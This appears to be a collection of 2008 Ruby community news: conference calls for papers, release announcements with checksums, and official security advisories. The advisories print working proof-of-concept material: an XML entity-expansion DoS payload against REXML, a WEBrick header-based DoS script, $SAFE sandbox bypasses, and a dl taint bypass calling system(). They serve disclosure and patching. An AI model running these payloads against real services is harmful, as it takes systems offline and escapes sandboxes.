Scotland on Rails is pleased to announce that Conference2009 will be held March 26-28 in Edinburgh, Scotland.

We are now accepting submissions. The closing date for submissions is December 1st 2008, so there’s still time! Please mail your plaintext proposals for 45 minute sessions to submissions@scotlandonrails.com.

Alternatively, if you are interested in sponsoring the conference, please mail sponsorship@scotlandonrails.com for a prospectus.

Lastly, if you wish to be notified when we open for registration, you can sign up on the site.

Come and enjoy all that Edinburgh has to offer (whisky! castle! volcano! ruby! whisky!) in March. We hope to see you there.

MountainWest RubyConf 2009 will be held March 13-14, 2009, in Salt Lake City, Utah, USA.

Proposals to speak at this regional conference are now being accepted. Please send your proposal to proposals@mtnwestrubyconf.org.

The submission deadline is midnight (MST) on December 31st, 2008.

There are sponsorship opportunities available as well. Please contact sponsorship@mtnwestruby.org if you are interested.

Please see mtnwestrubyconf.org/ for more details as they become available.

Yugui (Yuki Sonoda) announced the release of Ruby 1.9.1-preview 1:

This is a preview release of Ruby 1.9.1, which will be the first stable version of the Ruby 1.9 series. Try it out now and get an early taste of a modern, faster, multilingualized, and much improved Ruby with clearer syntax.

If you encounter any bugs or problems, please let us know via the official issue tracking system:

http://redmine.ruby-lang.org

You can download the release from;

• ftp://ftp.ruby-lang.org/pub/ruby/1.9/ruby-1.9.1-preview1.tar.bz2

  SIZE: 6169022 bytes MD5: 0d51dc949bb6b438ad4ebfabbb5f6754 SHA256: dc39000537d7c7528ef26af8e1c3a6215b30b6c579c615eaec7013513410456a

• ftp://ftp.ruby-lang.org/pub/ruby/1.9/ruby-1.9.1-preview1.tar.gz

  SIZE: 7409682 bytes MD5: 738f701532452fd5d36f5c155f3ba692 SHA256: 99443bdae9f94ba7b08de187881f8cbee172379edf9c5fa85fc04c869150ff6d

• ftp://ftp.ruby-lang.org/pub/ruby/1.9/ruby-1.9.1-preview1.zip

  SIZE: 8569116 bytes MD5: 5f68246246c4cd29d8a3b6b34b29b6ac SHA256: a6c3a7bf7ea83b595024764926353e08596a78e40c57ac58c568662e5e88df95

RubyConf 2008 is sold out

However, there is a waiting list you can join in case of cancellations.

Pearson Education is running a Voices That Matter Ruby conference this fall in Boston. The conference, from the same people who Addison-Wesley's Professional Ruby Series, will give you a chance to meet and learn from those very same authors. Don't miss a chance to interact with so many Ruby professionals.

There is a DoS vulnerability in the REXML library included in the Ruby Standard Library. A so-called "XML entity explosion" attack technique can be used for remotely bringing down (disabling) any application which parses user-provided XML using REXML.

Most Rails applications will be vulnerable because Rails parses user-provided XML using REXML by default.

Impact

An attacker can cause a denial of service by causing REXML to parse a document containing recursively nested entities such as:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE member [
  <!ENTITY a "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">
  <!ENTITY b "&c;&c;&c;&c;&c;&c;&c;&c;&c;&c;">
  <!ENTITY c "&d;&d;&d;&d;&d;&d;&d;&d;&d;&d;">
  <!ENTITY d "&e;&e;&e;&e;&e;&e;&e;&e;&e;&e;">
  <!ENTITY e "&f;&f;&f;&f;&f;&f;&f;&f;&f;&f;">
  <!ENTITY f "&g;&g;&g;&g;&g;&g;&g;&g;&g;&g;">
  <!ENTITY g "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx">
]>
<member>
&a;
</member>

Vulnerable versions

1.8 series

• 1.8.6-p287 and all prior versions
• 1.8.7-p72 and all prior versions

1.9 series

• all versions

Solution

Please download the following monkey patch to fix this problem.

• <URL:http://www.ruby-lang.org/security/20080823rexml/rexml-expansion-fix2.rb>

Then fix your application to load rexml-expansion-fix2.rb before using REXML.

require "rexml-expansion-fix2"
...
doc = REXML::Document.new(str)
...

If you have a Rails application, copy rexml-expansion-fix2.rb into a directory on the load path (such as RAILS_ROOT/lib/), and put the following line into config/environment.rb.

require "rexml-expansion-fix2"

If your application is Rails 2.1 or later, you can simply copy rexml-expansion-fix2.rb to RAILS_ROOT/config/initializers and it will be required automatically.

By default, XML entity expansion limit is 10000. You can change it by changing REXML::Document.entity_expansion_limit. e.g.

REXML::Document.entity_expansion_limit = 1000

This fix will be made available as a gem and used by future versions of rails, but users should take corrective action immediately.

Credit

Credit to Luka Treiber and Mitja Kolsek of ACROS Security for disclosing the problem to Ruby and Rails Security Teams.

Credit to Michael Koziarski of Rails Core Team for creating the monkey patch to fix the vulnerability.

Changes

• 2008-08-29 18:46 +09:00 fixed the summary not to mislead that this vulnerability is Rails specific.
• 2008-11-09 12:40 +09:00 fixed a bug of the monkey patch.

Ruby 1.8.7-p72 and 1.8.6-p287 have been released. The last releases were incomplete, and the new releases include fixes of the previously announced vulnerability of dl.

The released source archives are available at:

• <URL:ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.6-p287.tar.gz>
• <URL:ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.6-p287.tar.bz2>
• <URL:ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.6-p287.zip>
• <URL:ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.7-p72.tar.gz>
• <URL:ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.7-p72.tar.bz2>
• <URL:ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.7-p72.zip>

Checksums:

MD5(ruby-1.8.6-p287.tar.gz)= f6cd51001534ced5375339707a757556
SHA256(ruby-1.8.6-p287.tar.gz)= 6463d1932c34ff72b79174ac7d2c28940d29d147928250928a00a0dbee43db57
SIZE(ruby-1.8.6-p287.tar.gz)= 4590393

MD5(ruby-1.8.6-p287.tar.bz2)= 80b5f3db12531d36e6c81fac6d05dda9
SHA256(ruby-1.8.6-p287.tar.bz2)= ac15a1cb78c50ec9cc7e831616a143586bdd566bc865c6b769a0c47b3b3936ce
SIZE(ruby-1.8.6-p287.tar.bz2)= 3956902

MD5(ruby-1.8.6-p287.zip)= e555d51f5b387fdd52ae53d9bafa13f5
SHA256(ruby-1.8.6-p287.zip)= 844c66c015565839531a34b83e0526cd4fa2a71cc0f5cc8ddb0d4c158403543a
SIZE(ruby-1.8.6-p287.zip)= 5606238

MD5(ruby-1.8.7-p72.tar.gz)= 5e5b7189674b3a7f69401284f6a7a36d
SHA256(ruby-1.8.7-p72.tar.gz)= e15ca005076f5d6f91fc856fdfbd071698a4cadac3c6e25855899dba1f6fc5ef
SIZE(ruby-1.8.7-p72.tar.gz)= 4805594

MD5(ruby-1.8.7-p72.tar.bz2)= 0b215c46b89b28d7ab8d56d96e72d5b9
SHA256(ruby-1.8.7-p72.tar.bz2)= a8f8a28e286dd76747d8e97ea5cfe7a315eb896906ab8c8606d687d9f6f6146e
SIZE(ruby-1.8.7-p72.tar.bz2)= 4127450

MD5(ruby-1.8.7-p72.zip)= b44fe5a12d4bf138ba0d3660e13a8216
SHA256(ruby-1.8.7-p72.zip)= 77e67be4aa8c3e041e1d20d24e5fcf2e33ad9bccb3da3332b6c0a5b648334903
SIZE(ruby-1.8.7-p72.zip)= 5855902

For a full list of all changes, see the bundled files named ChangeLog, which are also available at the following locations:

• <URL:http://svn.ruby-lang.org/repos/ruby/tags/v1_8_6_287/ChangeLog>
• <URL:http://svn.ruby-lang.org/repos/ruby/tags/v1_8_7_72/ChangeLog>

Multiple vulnerabilities have been discovered in Ruby. It's recommended that you upgrade to the latest versions.

Details

The following vulnerabilities have been discovered.

Several vulnerabilities in safe level

Several vulnerabilities in safe level have been discovered.

• untrace_var is permitted at safe level 4.

  trace_var(:$VAR) {|val| puts "$VAR = #{val}" }
  
  Thread.new do
   $SAFE = 4
   eval %q{
     proc = untrace_var :$VAR
     proc.first.call("aaa")
   }
  end.join

• $PROGRAM_NAME may be modified at safe level 4.

  Thread.new do
   $SAFE = 4
   eval %q{$PROGRAM_NAME.replace "Hello, World!"}
  end.join
  
  $PROGRAM_NAME #=> "Hello, World!"

• Insecure methods may be called at safe level 1-3.

  class Hello
   def world
     Thread.new do
       $SAFE = 4
       msg = "Hello, World!"
       def msg.size
         self.replace self*10 # replace string
         1 # return wrong size
       end
       msg
     end.value
   end
  end
  
  $SAFE = 1 # or 2, or 3
  s = Hello.new.world
  if s.kind_of?(String)
   puts s if s.size < 20 # print string which size is less than 20
  end

• Syslog operations are permitted at safe level 4.

  require "syslog"
  
  Syslog.open
  
  Thread.new do
   $SAFE = 4
   eval %q{
     Syslog.log(Syslog::LOG_WARNING, "Hello, World!")
     Syslog.mask = Syslog::LOG_UPTO(Syslog::LOG_EMERG)
     Syslog.info("masked")
     Syslog.close
   }
  end.join

These vulnerabilities were reported by Keita Yamaguchi.

DoS vulnerability in WEBrick

WEBrick::HTTP::DefaultFileHandler is faulty of exponential time taking requests due to a backtracking regular expression in WEBrick::HTTPUtils.split_header_value.

Exploitable server:

require 'webrick'
WEBrick::HTTPServer.new(:Port => 2000, :DocumentRoot => "/etc").start

Attack:

require 'net/http'
res = Net::HTTP.start("localhost", 2000) { |http|
  req = Net::HTTP::Get.new("/passwd")
  req['If-None-Match'] = %q{meh=""} + %q{foo="bar" } * 100
  http.request(req)
}
p res

The request likely won't finish in this universe.

This vulnerability was reported by Christian Neukirchen.

Lack of taintness check in dl

dl doesn't check taintness, so it could allow attackers to call dangerous functions.

require 'dl'
$SAFE = 1
h = DL.dlopen(nil)
sys = h.sym('system', 'IP')
uname = 'uname -rs'.taint
sys[uname]

This vulnerability was reported by sheepman.

DNS spoofing vulnerability in resolv.rb

resolv.rb allow remote attackers to spoof DNS answers. This risk can be reduced by randomness of DNS transaction IDs and source ports, so resolv.rb is fixed to randomize them.

• see also: CVE-2008-1447

This vulnerability was reported by Tanaka Akira.

Vulnerable versions

1.8 series

• 1.8.5 and all prior versions
• 1.8.6-p286 and all prior versions
• 1.8.7-p71 and all prior versions

1.9 series

• r18423 and all prior revisions

Solution

1.8 series

Please upgrade to 1.8.6-p287, or 1.8.7-p72.

• <URL:ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.6-p287.tar.gz>
• <URL:ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.7-p72.tar.gz>

1.9 series

Please check out the latest version using Subversion.

$ svn co http://svn.ruby-lang.org/repos/ruby/trunk ruby

Please note that a package that corrects this weakness may already be available through your package management software.

Credit

Credit to Keita Yamaguchi, Christian Neukirchen, sheepman, and Tanaka Akira for disclosing these problems to Ruby Security Team.

Changes

• 2008-08-08 12:21 +09:00 fixed the revision number of ruby 1.9.
• 2008-08-11 11:23 +09:00 fixed the patchlevel of ruby 1.8. see the release announcement of Ruby 1.8.7-p72 and 1.8.6-p287

RubyConf 2008 will be held in Orlando, Florida, USA, from November 6 to November 8.

Proposals for presentations are now begin accepted. All proposals must be received by August 21.

Multiple vulnerabilities in Ruby may lead to a denial of service (DoS) condition or allow execution of arbitrary code.

Impact

With the following vulnerabilities, an attacker can lead to denial of service condition or execute arbitrary code.

• CVE-2008-2662
• CVE-2008-2663
• CVE-2008-2725
• CVE-2008-2726
• CVE-2008-2664

Vulnerable versions

1.8 series

• 1.8.4 and all prior versions
• 1.8.5-p230 and all prior versions
• 1.8.6-p229 and all prior versions
• 1.8.7-p21 and all prior versions

1.9 series

• 1.9.0-1 and all prior versions

Solution

1.8 series

Please upgrade to 1.8.5-p231, or 1.8.6-p230, or 1.8.7-p22.

• <URL:ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.5-p231.tar.gz> (md5sum: e900cf225d55414bffe878f00a85807c)
• <URL:ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.6-p230.tar.gz> (md5sum: 5e8247e39be2dc3c1a755579c340857f)
• <URL:ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.7-p22.tar.gz> (md5sum: fc3ede83a98f48d8cb6de2145f680ef2)

1.9 series

Please upgrade to 1.9.0-2.

• <URL:ftp://ftp.ruby-lang.org/pub/ruby/1.9/ruby-1.9.0-2.tar.gz> (md5sum: 2a848b81ed1d6393b88eec8aa6173b75)

These versions also fix the vulnerability of WEBrick (CVE-2008-1891).

Please note that a package that corrects this weakness may already be available through your package management software.

Credit

Credit to Drew Yao of Apple Product Security for disclosing the problem to Ruby Security Team.

Changes

• 2008-06-21 00:29 +09:00 removed wrong CVE IDs (CVE-2008-2727, CVE-2008-2728).